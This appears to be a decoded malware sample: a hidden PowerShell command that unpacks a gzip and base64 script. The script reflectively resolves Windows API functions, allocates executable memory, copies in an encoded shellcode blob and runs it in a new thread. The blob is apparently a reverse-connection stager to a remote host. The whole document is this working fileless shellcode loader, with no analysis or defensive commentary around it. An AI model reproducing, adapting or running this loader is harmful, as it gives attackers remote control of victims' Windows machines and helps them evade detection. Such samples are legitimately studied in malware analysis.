Decoded

1. "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('function pqX {
2. Param ($wv, $c8Uz0)
3. $yhI0L = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
4.  
5. return $yhI0L.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($yhI0L.GetMethod('GetModuleHandle')).Invoke($null, @($wv)))), $c8Uz0))
6. }
7.  
8. function aHK_ {
9. Param (
10. [Parameter(Position = 0, Mandatory = $True)] [Type[]] $qBI,
11. [Parameter(Position = 1)] [Type] $yDTG = [Void]
12. )
13.  
14. $sZk7m = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
15. $sZk7m.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $qBI).SetImplementationFlags('Runtime, Managed')
16. $sZk7m.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $yDTG, $qBI).SetImplementationFlags('Runtime, Managed')
17.  
18. return $sZk7m.CreateType()
19. }
20.  
21. [Byte[]]$cl = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmif9h1yaAIAAbuJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+mb////AcMpxnXBw7vwtaJWagBT/9U=")
22.  
23. $pJbs = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((pqX kernel32.dll VirtualAlloc), (aHK_ @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $cl.Length,0x3000, 0x40)
24. [System.Runtime.InteropServices.Marshal]::Copy($cl, 0, $pJbs, $cl.length)
25.  
26. $bxSxI = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((pqX kernel32.dll CreateThread), (aHK_ @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$pJbs,[IntPtr]::Zero,0,[IntPtr]::Zero)
27. [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((pqX kernel32.dll WaitForSingleObject), (aHK_ @([IntPtr], [Int32]))).Invoke($bxSxI,0xffffffff) | Out-Null
28. '))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))